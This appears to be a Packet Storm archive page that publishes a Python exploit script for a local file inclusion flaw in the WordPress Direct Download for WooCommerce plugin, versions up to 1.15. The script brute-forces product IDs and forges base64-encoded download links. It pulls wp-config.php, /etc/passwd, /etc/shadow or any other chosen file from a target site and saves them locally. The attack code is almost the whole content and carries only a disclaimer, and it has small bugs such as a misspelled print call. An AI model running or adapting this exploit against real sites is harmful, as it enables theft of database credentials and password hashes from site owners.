exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress WooCommerce Direct Download Local File Inclusion

WordPress WooCommerce Direct Download Local File Inclusion
Posted Jan 17, 2017
Authored by Diego Celdran Morell

WordPress Direct Download for WooCommerce versions up to 1.15 suffer from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
SHA-256 | c86f833ea2cb397491425f18175efc5680a0cebbd58bf33c3c099f1c010bedcf

WordPress WooCommerce Direct Download Local File Inclusion

Change Mirror Download
#lfi_attack_for_direct_download_woocommerce.py

#
# Author: Diego Celdran Morell
# Web: http://www.diegoceldran.es/
# Fecha Ultima actualizacion: 15/01/2017
# Version: V1.0
# No me hago responsable del mal uso que se le pueda dar a esta herramienta
#

import os;


try:
#pip install urlopen
import requests;

except (Exception):
#ejecutar pip install urlopen
print(" Installing required modules...");
os.system("pip install requests");
from urllib2 import urlopen


try:
#pip install urlopen
import base64;

except (Exception):
#ejecutar pip install urlopen
print(" Installing required modules...");
os.system("pip install base64");
import base64


def make_exploit(download_link):
lnk_download = download_link;

parts = lnk_download.split("/direct-download/");
toDecode = parts[1];
domain = parts[0];

if (toDecode[:-1] == "/"):
toDecode = toDecode[:count(toDecode)-1];

else:
toDecode = toDecode;

decoded = str(base64.b64decode(toDecode.encode('ascii')).decode('utf-8'));

productID = decoded.split("|")[0];

print(" ");
print(" ProductID: " + productID);
print(" ");
eject_exploit(productID, domain);


def eject_exploit(productID, domain):
print(" Select a file to download");
print(" [0] wp-config.php");
print(" [1] /etc/passwd");
print(" [2] /etc/shadow");
print(" or select another path to file to download");
print(" ");
optDownload = input(" >>> ");
print(" ");


if (domain[:7] == "http://"):
domain = domain;

elif (domain[:8] == "https://"):
domain = domain;

else:
domain = "http://" + domain;


if (optDownload == "0"):
fileToDownload = "wp-config.php";

elif (optDownload == "1"):
fileToDownload = "/etc/passwd";

elif (optDownload == "2"):
fileToDownload = "/etc/shadow"

else:
fileToDownload = optDownload;

url = domain + "/direct-download/" + base64.b64encode((str(productID) + "|" + fileToDownload).encode('ascii')).decode('utf-8');

print(" Downloading " + fileToDownload + " file from " + domain);
print(" Accesing to " + url);
print(" ");

req = requests.get(url);

if (req.status_code == 200):
print(" File downloaded correctly!");

fileName = fileToDownload.replace("\\", "/");
file = fileName.split("/");
fileText = str(file[-1]);

f = open(fileText, 'w');

f.write(req.text);

f.close();

print(" Acces to this file in: " + str(os.path.dirname(os.path.abspath(__file__))) + " folder");
print(" ");

else:
print(" [-] This domain is not vulnerable");

eject_exploit(productID, domain);


def get_product_id(domain, minID, maxID):
if(maxID == False):
maxID = 999999999999999999;

url = "";

if (domain[:7] == "http://"):
print(domain[:7]);
url = domain;

elif (domain[:8] == "https://"):
prin(domain[:8]);
url = domain;

else:
url = "http://" + domain;


if (url[:-1] == "/"):
url = url + "direct-download/";

else:
url = url + "/direct-download/";


actuallyId = minID;
idProduct = 0;

while (idProduct == 0 and actuallyId <= maxID):
encodedURL = base64.b64encode((str(actuallyId) + "|").encode('ascii'));
urlToTest = url + str(encodedURL.decode("utf-8")) + "/"
print(" Testing ID: " + str(actuallyId) + "; Getting URL: " + urlToTest);
#print("");

req = requests.get(urlToTest);

if (req.status_code == 200):

if("This product is not available for direct free download." in req.text):
# testing text you recibe
print(" [-] No product fount with ID: " + str(actuallyId));
print(" ");

else:
print(" [+] A product ID was fount: " + str(actuallyId));
print(" ");
idProduct = actuallyId;

else:
print(" [-] This domain is not vulnerable");

actuallyId = actuallyId+1;

if (idProduct != 0):
eject_exploit(idProduct, domain);


def testin_get_a_download_link(domain):
print(" Do you want try to find a valid URL for the website?");
print(" [0] no, exit");
print(" [1] yes, it may have a long time");
print(" ");
test_find = input(" >>> ");
print(" ");

if (test_find == "1"):
# Proseguir
print(" Please select the minimun id to find the product (0 to none; minimun id to start recomended: 400)");
minID = input(" >>> ");
print(" ");

if (minID == "0"):
minID = 1;

else:
minID = int(minID);

print(" Please select the maximun id to find the product (0 to stop manually when you want)");
maxID = input(" >>> ");
print(" ");

if (maxID == "0"):
maxID = False;

else:
maxID = int(maxID);

get_product_id(domain, minID, maxID);

else:
exit();


def get_download_link(domain):
print(" Please");
print(" Set a download link from the website: ");
print(" [0] I don't have any download link");
print(" ");
download_link = input(" >>> ");
print(" ");

if (download_link == "0"):
testin_get_a_download_link(domain);

else:
make_exploit(download_link);


def get_download_link_no_domain():
print(" Please");
print(" Set a download link from the website: ");
print(" [0] I don't have any download link");
print(" ");
download_link = input(" >>> ");
print(" ");

if (download_link == "0"):
print(" Please, select the domain to attack");
domain = input(" >>> ");
print("");
testin_get_a_download_link(domain);

else:
make_exploit(download_link);


def check_vulnerable_domain(domain = "diegoceldran.es"):
# Check if domain/direct-download/a/ return any thing
if (domain[:7] == "http://"):
url = domain;

elif (domain[:8] == "https://"):
url = domain;

else:
url = "http://" + domain;

if (url[:-1] == "/"):
url = url + "direct-download/a/";

else:
url = url + "/direct-download/a/";


req = requests.get(url);
if (req.status_code == 200):
print(" The web site: " + url + " respond: ");
print(" " + req.text);
print(" [+] This domain is maybe vulnerable");
print(" ");

get_download_link(domain);

else:
print(" [-] This domain is not vulnerable");

print(" ");
print(" LFI Attack for Direct Download Woocommerce plugin is started!");
print(" ");
print(" If you're using this module out of BrutiFramework, please, visit");
print(" http://www.diegoceldran.es/brutiframework-alfa/ to Download ");
print(" BrutiFramework from the oficial site. Thanks!");
print(" ");
print(" IMPORTANT:\n NO USE THIS EXPLOIT FOR ILEGAL PURPOSES");
print(" ");
print(" Select the target: (ej: www.diegoceldran.es)");
print(" [0] Omit the checking progress");
print(" ");
domain = input(" >>> ");
if (domain != "0"):
print(" ");
print(" Checking " + domain + "...");
print(" ");
check_vulnerable_domain(domain);

else:
print(" ");
get_download_link_no_domain();
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close